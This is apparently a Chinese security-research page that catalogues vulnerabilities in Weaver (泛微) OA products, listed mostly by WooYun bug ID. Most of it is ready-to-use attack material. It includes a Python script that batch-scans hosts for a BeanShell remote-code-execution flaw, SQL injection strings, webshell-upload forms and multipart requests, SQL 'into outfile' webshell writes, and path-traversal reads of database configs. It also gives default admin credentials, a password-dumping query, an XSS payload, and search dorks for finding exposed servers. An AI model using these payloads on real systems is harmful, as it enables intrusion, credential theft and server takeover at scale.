安全研究 - 泛微OA
接口
/login/Login.jsp?logintype=1 #前台登录
2019年
泛微e-cology OA数据库配置信息泄漏
包括不限于8.0、9.0版本
/mobile/dbconfigreader.jsp
2019年
泛微e-cology OA系统V8、V9版本SQL注入(暂未发现公开poc)
2019年 泛微e-cology OA系统远程代码执行
Fofa Dork app="泛微-协同办公OA"0x02 影响范围
包括但不限于7.0,8.0,8.1
/weaver/bsh.servlet.BshServlet/
单个|批量POC
import requests
import argparse
def verify(url,payload):
if 'http' not in url:
url = 'http' + "://" + url
Furl=url+"/weaver/bsh.servlet.BshServle"
with open("Vuln_list.txt",'a') as Vlist:
try:
res = requests.post(Furl, data = payload)
if res.status_code == 200:
if "Error:" not in res.text:
print(Furl + "is a vuln [Verify Success!]\n")
Vlist.write(url+'\n')
#
# else:
# print(str(res.status_code) + '\n' + Furl + '\n')
except Exception:
return
def ecologyexp(urls,mode):
payload={"bsh.script":"exec(\"whoami\")","bsh.servlet.output":"raw"}
if mode == '1':
verify(urls,payload)
elif mode == '2':
with open(urls) as uFile:
for url in uFile.readlines():
try:
verify(url, payload)
except Exception as e:
print(e)
continue
else:
pass
parser = argparse.ArgumentParser(description='e-cology verify',epilog="python2 e-cology-EXP.py -u url -m 1 || python2 e-cology-EXP.py -url url.txt -m 2")
parser.add_argument('--url','-u',help='')
parser.add_argument('--mode','-m',help='',default=1)
parser.add_argument('--urlList','-ul',help='')
parser.add_argument('--level','-lv',help='',default=1)
args = parser.parse_args()
if __name__ == '__main__':
with open("vuln_list.txt",'w') as vF:
vF.write("vuln_list\n")
try:
if args.urlList is not None:
ecologyexp(args.urlList,args.mode)
else:
ecologyexp(args.url, args.mode)
except Exception as e:
print(e)
CNVD-2019-34241
/mobile/browser/WorkflowCenterTreeData.jsp
受影响版本
泛微e-cology OA系统 JSP版本
Payload:
formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1
缺陷编号:wooyun-2015-0132247
漏洞标题:泛微OA办公系统一处通用SQL注入(需要登陆)
包含6.0及7.0版本
/workflow/FormBillBrowser.jsp
参数:formName 拼接sql未过滤
wooyun-2015-0137850
泛微OA系统通用任意文件上传getshell(附官方案例)
影响6.0、7.0、7.100、8.0(需要登录)
/page/maint/common/UserResourceUpload.jsp?dir=/
(1)存在文件上传绕过(更改后缀:1.jsp.,1.jspx ; 0x00截断)
(2)上传路径可控
payload:
<form method='post' action='http://xxxx/page/maint/common/UserResourceUpload.jsp?dir=/' enctype="multipart/form-data" >
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>
wooyun-2015-0140003
泛微OA通用系统三处SQL注入打包(官网可复现无需登录)
(1)/mobile/plugin/loadWfGraph.jsp requestid
(2)//ServiceAction/com.eweaver.workflow.subprocess.servlet.SubprocessAction?action=getlist&nodeid=1 nodeid
(3)//ServiceAction/com.eweaver.workflow.workflow.servlet.WorkflowinfoAction?action=getreqxml&workflowid=1&id=2* id
缺陷编号:wooyun-2016-0178866
漏洞标题:泛微OA某接口无需登录可执行任意SQL语句(附脚本)
/ws /ws/query?wsdl XML注入
缺陷编号:wooyun-2016-0169872
漏洞标题:泛微OA某处缺陷可遍历和操作系统文件
plugin\ewe\jsp\config.jsp
sUsername = "sysadmin";
sPassword = "weaversoft"
(1)/plugin/ewe/admin/default.jsp 新建文件1.txt
(2)越权删除文件: /plugin/ewe/admin/upload.jsp?id=11&dir=../../../../
wooyun-2015-0155705
泛微OA未授权可导致GetShell
/sysinterface/codeEdit.jsp?filename=ccccc.jsp&filetype=jsp
上传马路径:/sysinterface/extpage/ccccc.jsp
路径可控:
/sysinterface/codeEdit.jsp?filename=。../../ccccc.jsp&filetype=jsp
上传马路径:http://url/ccccc.jsp
缺陷编号:wooyun-2015-0141834
漏洞标题:雨润集团泛微OA系统表单任意上传拿shell
/tools/SWFUpload/upload.jsp
payload:
<form method='post' action='http://url/tools/SWFUpload/upload.jsp' enctype="multipart/form-data" >
<input type="file" id="file" name="test" style="height:20px;BORDER: #8F908B 1px solid;"/>
<button type=submit value="getshell">getshell</button> </form>
上传马路径:http://url/shell.jsp
缺陷编号:wooyun-2015-0138725
漏洞标题:泛微OA通用系统存在SQL注入漏洞(官网可复现无需登录)
/mobile/plugin/PreDownload.jsp url sql拼接未过滤
缺陷编号:wooyun-2015-0132258
漏洞标题:泛微OA系统存在SQL注入漏洞(附测试脚本)
/ServiceAction/com.eweaver.base.security.servlet.LoginAction?action=getLabelNameByKeyId&keywordid=402881e43c2385f6013c2385f6720002&language=zh_CN&labelParams= //keywordid Oracle 布尔盲注
反射型XSS:/main/login.jsp
Payload: 1'"()&%<ScRiPt >prompt(930551)</ScRiPt>
缺陷编号:wooyun-2015-0129483
漏洞标题:泛微OA系统敏感文件未授权访问
/messager/users.data XML格式数据base64加密
缺陷编号:wooyun-2015-0127502
漏洞标题:泛微OA某处通用注入(不需登录)
/web/WebSearchDsp.jsp?key=1 //key
缺陷编号:wooyun-2015-0125738
漏洞标题:泛微OA系统漏洞缺陷打包
SQL注入(需登陆)
(1)
http://pm.weaver.cn:9085/ServiceAction/com.eweaver.workflow.request.servlet.RequestlogAction?action=getrelog&requestid=402880484c2a7512014e52de46894dc5 //requestid
(2)
/ServiceAction/com.eweaver.base.orgunit.servlet.OrgunitTreeAction?action=getChildrenExt&type=orgdef&sqlwhere=&node=Orgunit_402881e70ad1d990010ad1e5ec930008&reftype=402881e510e8223c0110e83d427f0018 //reftype
越权(需登陆)
(1)
/main/main.jsp 个人信息——》上传头像图片-》抓包捕获到get请求(该请求可在浏览器访问)
/humres/base/uploadavatar.jsp?id=4022141241232(修改id即可修改他人头像)
(2)
/ServiceAction/com.eweaver.base.security.servlet.SysuserAction?action=modifyAccountStatus&id=用户id&v=0&fieldName=isclosed //越权修改用户权限(v参数控制用户是否可以登陆-》sysuser表中isclosed字段)
存储型XSS(需登陆)
个人中心->个人信息->详细信息-》英文名称
缺陷编号:wooyun-2015-0104678 (泛微oa的e-Mobile)
漏洞标题:泛微oa某系统通用注入漏洞(5案例)
4.5,4.6版本存在注入 盲注/延迟注入
Payload:
-1' OR (8705=8705) AND 'a'='a
缺陷编号:wooyun-2014-076191
漏洞标题:泛微OA漏洞集合·2(SQL注入/文件上传getshell)
0x01:SQL注入漏洞 4 处
(1)
POST /general/new_mytable/content_list/
content_-99.php?user_id=WV00000045&lang=cn HTTP/1.1
block_id=1901&body_width=1121&_= //block_id
(2)
/general/address/view/view_detail.php?ADD_ID=-169%20UNION%20SELECT%201,2,3,4,5,6,version(),8,9,database(),user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 //ADD_ID
(3)
/general/address/docenter/export_do.php?group_id=19%20UNION%20SELECT%20user(),database(),version(),4,5,6,7,8,9,10,11,12,13,14,15,16 //group_id
(4)
/general/file_folder/file_new/neworedit/getContentByType.php?type=1&content_id=319*&SORT_ID=148&FILE_SORT=1 //content_id
0x02:文件上传导致Getshell
/general/workflow/input_form/input_form.php?RUN_ID=5557&FLOW_ID=3115&PRCS_ID=1&FLOW_PRCS=1&FUNC_ID=
//cvs --> php
缺陷编号:wooyun-2014-074972
漏洞标题:泛微OA漏洞集合(sql注入、未授权访问等)
0x01:越权(需登陆)
(1)
/general/email/new/index.php?EMAIL_ID=7 //EMAIL_ID
(2)
/ikernel/admin/
0x02:SQL注入(需登陆)
(1)
/ikernel/admin/IK_TABLE/field/?TABLE_ID=9 //TABLE_ID
0x03:文件下载
/general/notify/show/header.php?ATTACHMENT_ID=1738682577&FILE_NAME=../../inc/oa_config.php
0x04:文件上传
/general/email/ 内部邮件-》新建邮件-》上传 “php4”
shell验证:/attachment/源码中找到的部分路径/文件名.php4
缺陷编号:wooyun-2014-069288
漏洞标题:泛微OA系统通用后台几处注入(官方demo验证)
(1)
/systeminfo/sysadmin/sysadminEdit.jsp?id=1 //id 管理员权限
(2)
//cowork/CoworkLogView.jsp?id=151 //id 普通用户权限
(3)
/system/basedata/basedata_role.jsp?roleid=32 //roleid 普通用户权限
(4)
//system/basedata/basedata_hrm.jsp?resourceid=3 //resourceid 普通用户权限
缺陷编号:wooyun-2013-039855
漏洞标题:泛微E-office OA管理系统# 验证其通用性:SQL注入、任意文件下载、文件上传等漏洞
(1)phpmyadmin #无需认证可登陆
(2)SQL注入
/general/news/show/read_news.php?NEWS_ID=214%20and%201=2%20union%20select%201,user(),database(),4,5,6 //NEWS_ID
(3)文件下载
/inc/attach.php?OP=1&ATTACHMENT_NAME=index.php&ATTACHMENT_ID=5402024843
/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/oa_config.php&ATTACHMENT_ID=5402024843 (zend加密)
/inc/attach.php?OP=1&ATTACHMENT_NAME=../../inc/mysql_config.ini&ATTACHMENT_ID=5402024843
(4)文件上传
我的主页-》编辑工作计划-》附件上传-》php4
shell地址:/attachment/xxx/shell.php4
缺陷编号:WooYun-2015-0124589
漏洞标题:泛微某通用系统存在SQL注入漏洞(无需登录)
(1)
/main/login.jsp 用户名:sysadmin' --》报错回显
抓包:
/j_acegi_security_check?dynamicpass=&encData=&ip=xxxxx&isIP=0&isdx=0&isusb=0&j_password=a&j_username=sysadmin'&needauthcode=0&rememberme=0&rndData=345655458600837&sendpass=0&uname=sysadmin' //j_username
(2)
/ServiceAction/com.eweaver.base.DataAction?sql=|20select|20*|20from|20v$version|20where|20rownum|20=|201 //可查看数据库版本
wooyun-2015-0124788
1.未授权访问及任意文件遍历
/weaver/weaver.email.FileDownloadLocation?fileid=46&download=1
/weaver/weaver.file.filedownload?fileid=1
2.注入漏洞
/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1(泛微OA7) //fileid
缺陷编号:WooYun-2013-038914
漏洞标题:泛微E-office OA管理系统存在任意文件下载及文件上传导致任意代码执行(已getshell)
文件上传
分析inc/utility_all.php 的源码可知附件上传的路径为:attachment/$ATTACHMENT_ID /$ATTACHMENT_NAME
个人日志->上传附件,查看源码得到相应的 ATTACHMENT_ID 及 ATTACHMENT_NAME 的值
从配置文件中可以知道,附件中未禁止php4格式的文件上传,因此可以直接getshell(system权限)
wooyun-2015-0124027(sql语句任意执行)
/ServiceAction/com.eweaver.base.DataAction?sql=select LONGONNAME from SYSUSER where LOGONPASS = '密码(base64加密)'
applychen(wooyun-2010-034523)泛微E-office OA管理系统存在SQL注射漏洞(未找到相关信息)
wooyun-2010-0137042(未找到相关信息)
缺陷编号:wooyun-2016-0215533
漏洞标题:泛微eweaver任意数据库操作
/ws/query //webservice实现类QueryServiceImplquery中的queryBy可执行数据库命令
缺陷编号:wooyun-2016-0191882
漏洞标题:泛微ecology系统所有版本SQL注入(官网为例)二
需普通用户权限
影响范围:
8.100.0531+KB81001511、 7.100.0331 、5.000.0327+KB50001107、 4.100.0919
缺陷编号:wooyun-2016-0198158
漏洞标题:泛微ecology无需登录SQL注入2+任意文件读取
(1)sql注入
SignatureDownLoad类中 markId参数未做过滤
(2)文件读取
markPath参数可控
缺陷编号:wooyun-2016-0169453
漏洞标题:泛微协同商务系统e-cology某处SQL注入(附验证中转脚本)
//services/ //XML注入
缺陷编号:wooyun-2015-0164133
漏洞标题:泛微e-office官网存在奇葩漏洞可查看注册人信息及更改产品信息
/eoffice_web/index.php?s=/admin/settings/register.html
/eoffice_web/index.php?s=/admin/update/update_list.html
缺陷编号:wooyun-2015-0148980
漏洞标题:泛微某通用系统设计缺陷遍历目录并可GetShell(需登录)
1.目录遍历
//document/imp/filebrowser.jsp?dir=D:\\
2.文件上传(需登陆)
xxx/base/skin/skincreate.jsp
shell路径:/css/skins/skin4/shell.jsp
缺陷编号:wooyun-2015-0141786
漏洞标题:无需登录sql注入泛微集团分权管理(e-cology)(某世界500强企业&demo复现)
/login/Login.jsp?logintype=1
登陆抓包-》
/login/VerifyLogin.jsp?loginfile=%2Fwui%2Ftheme%2Fecology7%2Fpage%2Flogin.jsp%3FtemplateId%3D41%26logintype%3D1%26gopage%3D&logintype=1&fontName=%CE%A2%C8%ED%D1%C5%BA%DA&message=&gopage=&formmethod=get&rnd=&serial=&username=&isie=false&loginid=test&userpassword=11111111111&tokenAuthKey=&islanguid=7&submit= //loginid
缺陷编号:wooyun-2015-0136818
漏洞标题:泛微e-cology通用型4处SQL注入漏洞
1 注入点 /pweb/careerapply/HrmCareerApplyPerEdit.jsp,参数id
2 注入点 /pweb/careerapply/HrmCareerApplyPerView.jsp,参数id
3 注入点 /pweb/careerapply/HrmCareerApplyWorkEdit.jsp,参数id
4 注入点 /pweb/careerapply/HrmCareerApplyWorkView.jsp,参数id
5 注入点 /web/careerapply/HrmCareerApplyPerEdit.jsp,参数id
6 注入点 /web/careerapply/HrmCareerApplyPerView.jsp,参数id
7 注入点 /web/careerapply/HrmCareerApplyWorkEdit.jsp,参数id
8 注入点 /web/careerapply/HrmCareerApplyWorkView.jsp
缺陷编号:wooyun-2015-0136823
漏洞标题:泛微e-cology通用型6处SQL注入漏洞
1 注入点 /web/broswer/SectorInfoBrowser.jsp,参数sqlwhere
2 注入点 /web/broswer/CustomerTypeBrowser.jsp,参数sqlwhere
3 注入点 /web/broswer/CustomerSizeBrowser.jsp,参数sqlwhere
4 注入点 /web/broswer/CustomerDescBrowser.jsp,参数sqlwhere
5 注入点 /web/broswer/ContacterTitleBrowser.jsp,参数sqlwhere
6 注入点 /web/broswer/CityBrowser.jsp,参数sqlwhere
缺陷编号:wooyun-2015-0136828
漏洞标题:泛微某系统存在通用型注入(以官网和中国移动为例)
(1)
/login.do -》登录抓包 /verifyLogin.do //loginid
payload:
loginid: aaa' or password like 'c4ca4238a0b923820dcc509a6f75849b' and 'a'='a
password: 1
(2)
/client.do?method=getlist&sessionkey=xxx&module=7&scope=4&pageindex=1&keyword=1 //keyword (需登录)
缺陷编号:wooyun-2015-0134994
漏洞标题:泛微e-cology通用性SQL注入漏洞(附脚本)
/web/careerapply/HrmCareerApplyAdd.jsp //careerid
缺陷编号:wooyun-2015-0130759
漏洞标题:某OA平台系统泄露所有账户密码,包括管理员,无需登录(已进入泛微自己的管理系统)
/ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER
缺陷编号:wooyun-2015-0128007
漏洞标题:泛微eoffice前台getshell+一处小问题(无需登录)
(1)sql注入
/inc/group_user_list/group_xml.php //par
Payload:
[group]:[1]|[groupid]:[1'] =》W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxJ10=
[group]:[1]|[groupid]:[1 union select '<?php phpinfo()?>',2,3,4,5,6,7,8 into outfile '../webroot/axxxxxxxx.php'] =》W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxIHVuaW9uIHNlbGVjdCAnPD9waHAgcGhwaW5mbygpPz4nLDIsMyw0LDUsNiw3LDggaW50byBvdXRmaWxlICcuLi93ZWJyb290L2F4eHh4eHh4eC5waHAnXQ==
(2)未授权访问
/UserSelect/main.php
缺陷编号:wooyun-2015-0127270
漏洞标题:泛微eoffice两处sql注入打包+一处越权(无需登录)
(1)sql注入
/E-mobile/calendar_page.php //detailid
/E-mobile/diarymy_page.php //start
Payload:
1,1 procedure analyse((select IF(MID(user(),1,1)=114, sleep(5),1)),1)
(2)越权
E-mobile/email_page.php //detailid
缺陷编号:wooyun-2015-0126024
漏洞标题:泛微E-office注入篇之无需登陆注射第1-20处(附官网案例)
(1)
/E-mobile/flowdo_page.php?diff=delete&RUN_ID=1 //参数RUN_ID
(2)
/E-mobile/flowdo_page.php?diff=delete&flowid=1 //参数flowid
(3)
/E-mobile/flowsorce_page.php?flowid=2 //flowid
(4)
/E-mobile/flownext_page.php?diff=candeal&detailid=2,3 //参数detailid
(5)
/E-mobile/flowimage_page.php?FLOW_ID=2 //FLOW_ID
(6)
/E-mobile/flowform_page.php?FLOW_ID=2 //FLOW_ID
(7)
/E-mobile/diaryother_page.php?searchword=23 //searchword
(8)
/E-mobile/create/ajax_do.php?diff=word&sortid=1 //参数sortid
(9)
/E-mobile/create/ajax_do.php?diff=word&idstr=2 //参数idstr
(10)
/E-mobile/create/ajax_do.php?diff=addr&sortid=1 //参数sortid
(11)
/E-mobile/create/ajax_do.php?diff=addr&userdept=1 //参数userdept
(12)
/E-mobile/create/ajax_do.php?diff=addr&userpriv=1 //参数userpriv
(13)
/E-mobile/create/ajax_do.php?diff=wordsearch&idstr=1 //参数idstr
(14)
/E-mobile/flow/flowhave_page.php?detailid=2,3 //detailid
(15)
/E-mobile/flow/flowtype_free.php?flowid=1 //flowid
(16)
/E-mobile/flow/flowtype_free.php?runid=1 //runid
(17)
/E-mobile/flow/flowtype_other.php?flowid=1 //flowid
(18)
/E-mobile/flow/flowtype_other.php?runid=1 //runid
(19)
/E-mobile/flow/freeflowimage_page.php?fromid=2 //fromid
(20)
/E-mobile/flow/freeflowimage_page.php?diff=new&runid=2 //参数runid
缺陷编号:wooyun-2015-0125638
漏洞标题:泛微Eoffice 某2个文件多处任意文件读取/多处任意文件上传可直接getshell
文件读取
(1)
Payload:
默认读取目录为/attachment/
/iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini
(2)
Payload:
默认读取目录为/attachment/
/iweboffice/officeserver.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../mysql_config.ini
(3)
Payload:
默认读取目录为/attachment/
/iweboffice/officeserver.php?OPTION=GETFILE&REMOTEFILE=../mysql_config.ini
文件上传
(1)
/iweboffice/officeserver.php?OPTION=SAVEFILE&FILENAME=shell.php
shell路径:/attachment/shell.php
(2)
/iweboffice/officeserver.php?OPTION=SAVETEMPLATE&TEMPLATE=shell.php
shell路径:/attachment/shell.php
(3)
case "SAVEASHTML"
(4)
case "SAVEIMAGE"
(5)
case "UPDATEFILE"
(6)
case "PUTFILE"
(7)
/webservice/upload/upload.php
Payload:
<form action="http://网站地址/ webservice/upload/upload.php" form enctype="multipart/form-data" method="POST">
<input name="file" type="file">
<input name="" type="submit">
</form>
(8)
/webservice-json/upload/upload.php
(9)
/webservice-xml/upload/upload.php
缺陷编号:wooyun-2015-0125592
漏洞标题:泛微Eoffice 三处任意文件上传可直接getshell
(1)
/webservice/upload.php
Payload:
<form action="http://url/webservice/upload.php" form enctype="multipart/form-data" method="POST">
<input name="file" type="file">
<input name="" type="submit">
</form>
(2)
inc/jquery/uploadify/uploadify.php
Payload:
<form action="http://url/ inc/jquery/uploadify/uploadify.php" form enctype="multipart/form-data" method="POST">
<input name=" Filedata" type="file">
<input name="" type="submit">
</form>
(3)
/general/weibo/javascript/LazyUploadify/uploadify.php
Payload:
<form action="http://url/general/weibo/javascript/LazyUploadify/uploadify.php" form enctype="multipart/form-data" method="POST">
<input name="Filedata" type="file">
<input name="" type="submit">
</form>
(4)
/general/weibo/javascript/uploadify/uploadify.php
Payload:
POST /general/weibo/javascript/uploadify/uploadify.php?uploadType=shell
Content-Type: multipart/form-data; boundary=---------------------------94401197120954
Content-Length: 214
-----------------------------94401197120954
Content-Disposition: form-data; name="Filedata"; filename="2.php"
Content-Type: application/x-php
<?php phpinfo();?>
-----------------------------94401197120954--
Shell路径: /attachment/shell.php
(5)
/general/weibo/javascript/uploadify/uploadify.php
Payload:
POST /general/weibo/javascript/uploadify/uploadify.php?user_ID=shell
Content-Type: multipart/form-data; boundary=---------------------------94401197120954
Content-Length: 214
-----------------------------94401197120954
Content-Disposition: form-data; name="Filedata"; filename="2.php"
Content-Type: application/x-php
<?php phpinfo();?>
-----------------------------94401197120954--
Shell路径: /attachment/personal/$userID/$userID_temp.php
缺陷编号:wooyun-2015-0125279
漏洞标题:泛微E-office 同一文件多处sql注射/用户信息泄露(ROOT SHELL)
//webservice/eoffice.wsdl.php?wsdl (XML注入)
缺陷编号:wooyun-2015-0125286
漏洞标题:泛微e-office 任意文件下载
/E-mobile/Data/downfile.php?url=/E-mobile/Data/downfile.php
缺陷编号:wooyun-2015-0125282
漏洞标题:泛微E-office 3处sql注射(ROOT SHELL)/2处任意文件上传
XML注入
(1)
webservice-json/login/login.wsdl.php?wsdl
(2)
/webservice/login/login.wsdl.php?wsdl
(3)
//webservice/eoffice.wsdl.php?wsdl
/webservice/eoffice.wsdl.php?wsdl
(4)
/webservice-xml/login/login.wsdl.php?wsdl
文件上传
(1)
/webservice/upload.php
shell路径:attachment/$attachmentID $attachmentID 会回显
(2)
/webservice/upload/upload.php
(3)
webservice-json/upload/upload.php
缺陷编号:wooyun-2015-0124503
漏洞标题:泛微Eoffice某处文件存在多处SQL注入及可绕过登录直接操作后台
sql注入
/client_converter.php //userAccount lang funcID
越权
步骤一:/client_converter.php?userAccount=admin&lang=cn(给session赋值)
步骤二:/general/system/user/userlist.php
缺陷编号:wooyun-2015-0112675
漏洞标题:泛微的OA系统(泛微E-COLOGY)存在严重的信息安全漏洞
/weaver/weaver.file.FileDownload?fileid=12
缺陷编号:wooyun-2015-0105535
漏洞标题:泛微Eoffice无需登录的SQL注入(多处)
1
/E-mobile/diarydo.php //diary_id
2
/E-mobile/notify_page.php //detailid
3
/E-mobile/emailreply_page.php //detailid
4
/E-mobile/sms_page.php //detailid
5
/E-mobile/source_page.php //emailid
缺陷编号:wooyun-2015-0105520
漏洞标题:泛微e-office无需登录GETSHELL
/E-mobile/Data/login_other.php
使用stripslashes进行反转义,导致可以绕过GPC进行注入
Payload:
/E-mobile/Data/login_other.php?diff=sync&auth={"auths":[{"value":"-1' UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23"}]}
/e-mobile/Data/login_other.php?diff=sync&auth={%22auths%22:[{%22value%22:%22-1%27%20UNION%20SELECT%201,2,%27%3C?php%20phpinfo();%20?%3E%27,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20into%20outfile%20%27D:/eoffice/webroot/shell.php%27%23%22}]}
shell路径:http://url/shell.php
缺陷编号:wooyun-2015-0105290
漏洞标题:泛微e-office无需登录注入一枚
/inc/priv_user_list/priv_xml.php //userpriv(数组型注入-需base64编码)
缺陷编号:wooyun-2015-0104799
漏洞标题:泛微Eoffice多个文件SQL注入续(无需登录)
/E-mobile/flowimg.php //FLOW_ID RUN_ID
缺陷编号:wooyun-2015-0104782
漏洞标题:泛微Eoffice多个文件SQL注入(无需登录)
(1)
/eoffice/api/email.class.php //emailid
(2)
/E-mobile/source_page.php //emailid
(3)
/E-mobile/emailreply_page.php //emailid
(4)
/E-mobile/email_page.php //emailid
缺陷编号:wooyun-2014-087500
漏洞标题:泛微Eoffice无需登录直接getshell
/mysql_config.ini
缺陷编号:wooyun-2014-082627
漏洞标题:泛微某系统通用型SQL注入漏洞打包(全版本)
(1)
/homepage/Homepage.jsp //hpid
(2)
/page/element/7/News.jsp //eid
(3)
/CRM/data/ViewCustomerBase.jsp //requestid
(4)
/page/element/compatible/view.jsp //eid
(5)
/page/element/Weather/View.jsp //eid
(6)
/proj/data/ViewProject.jsp //ProjID
缺陷编号:wooyun-2014-078802
漏洞标题:泛微e-cology系统又一sql注入(无需登录)
homepage/LoginHomepage.jsp //hpid
缺陷编号:wooyun-2014-078769
漏洞标题:泛微e-cology存在sql注入(无需登录)
/page/maint/login/Page.jsp //templateId
缺陷编号:wooyun-2014-076547
漏洞标题:泛微某系统漏洞集合(不拿shell不是合格的白帽子)
//需登录
漏洞模块为:我的邮件 -- 联系人 -- 导入 -- 以逗号为分隔符的CVS文件
最终得到的文件路径为:http://url/email/csv/上传的文件名.jsp
缺陷编号:wooyun-2014-072571
漏洞标题:泛微eteams_oa系统越权修改任意用户信息
//需登录
缺陷编号:wooyun-2014-055521
漏洞标题:泛微E-office OA管理系统通过sql注入可以任意真实用户名免密码登陆
post请求,url为general/index.php,
smsid为1 union select '1','1','admin','1','1','1','1','1','1','1','1','1','1','1',两者都经过DES3加密后再经过base64转码
缺陷编号:wooyun-2013-034523
漏洞标题:泛微E-office OA管理系统存在SQL注射漏洞可查库
/general/file_folder/file_new/neworedit/index.php // CONTENT_ID
日志未授权访问
/log/ecology_date.log
wooyun-2015-0125281(未找到相关信息)
wooyun-2015-0125265(未找到相关信息)
wooyun-2010-07497(未找到相关信息)
wooyun-2010-034523(未找到相关信息)
谷歌搜索 allintext: 用户名: 密码: 记住密码. 自动登录. E-Mobile
百度dork:泛微协同商务系统
ZoomEye搜索泛微/
Fofa Dork app="泛微-协同办公OA"